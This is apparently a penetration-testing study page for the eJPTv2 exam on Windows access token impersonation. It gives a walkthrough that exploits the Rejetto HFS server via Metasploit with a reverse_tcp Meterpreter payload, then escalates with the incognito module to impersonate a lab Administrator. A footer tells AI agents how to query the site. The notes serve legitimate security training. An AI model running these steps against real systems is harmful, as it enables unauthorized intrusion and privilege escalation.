> For the complete documentation index, see [llms.txt](https://blog.rootkid.in/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://blog.rootkid.in/exam-prep-notes/junior-penetration-tester-ejptv2-notes/host-and-network-penetration-testing/system-host-based-attacks/windows-privilege-escalation/access-token-impersonation.md).

# Access Token Impersonation

## Windows Access Tokens

* Windows access tokens are a core element of the authentication process on Windows and are created and managed by the **`Local Security Authority Subsystem Service (LSASS).`**
* A Windows access token is responsible for identifying and describing the security context of a process or thread running on a system. Simply put, an access token can be thought of as a temporary key akin to a web cookie that provides users with access to a system or network resource without having to provide credentials each time a process is started or a system resource is accessed.
* Access tokens are generated by the winlogon.exe process every time a user authenticates successfully and includes the identity and privileges of the user account associated with the thread or process. This token is then attached to the userinit.exe process, after which all child processes started by a user will inherit a copy of the access token from their creator and will run under the privileges of the same access token.
* Windows access tokens are categorized based on the varying security levels assigned to them. These security levels are used to determine the privileges that are assigned to a specific token.
* An access token will typically be assigned one of the following security levels:
  * Impersonate-level tokens are created as a direct result of a non-interactive login on Windows, typically through specific system services or domain logons.
  * Delegate-level tokens are typically created through an interactive login on Windows, primarily through a traditional login or through remote access protocols such as RDP.
* Impersonate-level tokens can be used to impersonate a token on the local system and not on any external systems that utilize the token.
* Delegate-level tokens pose the largest threat as they can be used to impersonate tokens on any system.

## Windows Privileges

* The process of impersonating access tokens to elevate privileges on a system will primarily depend on the **privileges assigned** to the account that has been exploited to gain initial access as well as the impersonation or delegation tokens available..
* The following are the privileges that are required for a successful impersonation attack:
  * `SeAssignPrimaryToken`: This allows a user to impersonate tokens.
  * `SeCreateToken`: This allows a user to create an arbitrary token with administrative privileges.
  * `SeImpersonatePrivilege`: This allows a user to create a process under the securitycontext of another user typically with administrative privileges.

## The Incognito Meterpreter Module

* **Incognito Meterpreter Module** is a built-in tool in Metasploit that was originally developed as a standalone application for token impersonation after a successful exploit.
* The **Incognito module** allows you to **display a list of available user tokens** that can be impersonated.
* It enables **token impersonation**, allowing you to assume different user identities and access elevated privileges on the compromised system.
* This module enhances **post-exploitation capabilities**, enabling deeper system access and facilitating the assessment of security risks by adopting various user tokens.

## Attack Flow for the Access Token Impersonation Attack

### 1. **Exploit Vulnerability**

* **Target**: HTTP Rejetto web server
* **Vulnerability**: Remote Code Execution (RCE)
* **Tool**: Metasploit Framework
* **Module**: `exploit/windows/http/rejetto_hfs_exec`
* **Action**: Use the `msfconsole` to launch the exploit and gain basic access to the server.
* **Command**:

  ```bash
  use exploit/windows/http/rejetto_hfs_exec
  set RHOSTS [Target IP]
  set PAYLOAD windows/meterpreter/reverse_tcp
  set LHOST [Your IP]
  exploit
  ```

### 2. **Check System Information**

* **Action**: Once you have a Meterpreter session, run the `sysinfo` command to gather system details.
* **Command**:

  ```bash
  sysinfo
  ```
* **Observation**: Confirm the system is 32-bit (x86) based on the output.

### 3. **Attempt to** [**Migrate to 64-bit Shell**](https://blog.rootkid.in/exam-prep-notes/junior-penetration-tester-ejptv2-notes/host-and-network-penetration-testing/system-host-based-attacks/windows-privilege-escalation/pages/xj7uLhDPRWqP8BUDk4SA#id-2.-transition-to-a-64-bit-x64-shell)

* **Issue**: You may encounter “Access is denied” if trying to migrate to a 64-bit shell because the current session is 32-bit.
* **Solution**: Use the **`incognito`** module to bypass this restriction instead.

### 4. **Check Privileges**

* **Action**: Execute the `getuid` command to check the current user.
* **Command**:

  <pre class="language-bash"><code class="lang-bash"><strong>getuid
  </strong></code></pre>
* **Output**: Shows "LOCAL SERVICE" as the current user.
* **Next Step**: Run `getprivs` to list available privileges.
* **Command**:

  ```bash
  getprivs
  ```

### 5. **Leverage Privileges for Token Impersonation**

* **Privilege**: **`SeImpersonatePrivilege`** is available, allowing token impersonation.
* **Action**: Load the **`incognito`** module to use this privilege.
* **Command**:

  ```bash
  load incognito
  ```

### 6. **List Available Tokens**

* **Action**: Display user tokens to find a higher privilege token.
* **Command**:

  ```bash
  list_tokens -u
  ```

### 7. **Impersonate a Higher Privilege User**

* **Action**: Use the **`impersonate_token`** command to assume the identity of a higher privilege user.
* **Command**:

  ```bash
  impersonate_token "ATTACKDEFENSE\Administrator"
  ```

### 8. **Migrate to a 64-bit Shell**

* **Action**: After impersonation, migrate to a 64-bit (x64) shell.
* **Command**:

  ```bash
  migrate [x64 Process ID]
  ```

***

***

***

**`Hacker's Mantra:`**`Computer hackers do not need to know each other’s real names, or even live on the same continent, to steal millions in mere hours. - Robert Mueller`


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.rootkid.in/exam-prep-notes/junior-penetration-tester-ejptv2-notes/host-and-network-penetration-testing/system-host-based-attacks/windows-privilege-escalation/access-token-impersonation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.